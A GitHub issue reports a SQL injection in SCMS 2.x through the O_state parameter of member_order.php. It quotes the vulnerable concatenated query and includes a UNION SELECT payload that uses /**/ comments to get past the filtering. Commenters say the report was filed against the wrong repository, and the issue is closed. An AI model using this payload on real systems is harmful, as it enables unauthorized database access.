Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

scms 2.x sql injection #3

Closed
ParadiseCong opened this issue Dec 5, 2018 · 2 comments
Closed

scms 2.x sql injection #3

ParadiseCong opened this issue Dec 5, 2018 · 2 comments

Comments

@ParadiseCong
Copy link

An issue was discovered in Sales & Company Management System (SCMS).It has SQL injection during order operation via the member/member_order.php O_state parameter.
In line 97
the parameter state was joined to sql statement
$sql="select * from SL_orders,SL_product,SL_lv,SL_member where M_lv=L_id && O_member=M_id && O_pid=P_id && O_member=".$M_id." ".$state." order by O_id desc";
2
as for the parameter state,it comes from the line 12,while scms has been filtered some characters
1
It also cause sql injection
3/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,10,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69#
_20181205174757

@attritionorg
Copy link

@ParadiseCong Are you sure you filed this against the right repo? member_order.php does not appear to exist in this S-CMS. Perhaps you are testing Zibo S-CMS Enterprise Website System (企业建站系统) at https://www.s-cms.cn/download.html?code=php?

@Venan24
Copy link
Owner

Venan24 commented Mar 4, 2019

This is not right repository. This repo does not have those issues or the files you are referring to.

@Venan24 Venan24 closed this as completed Mar 4, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants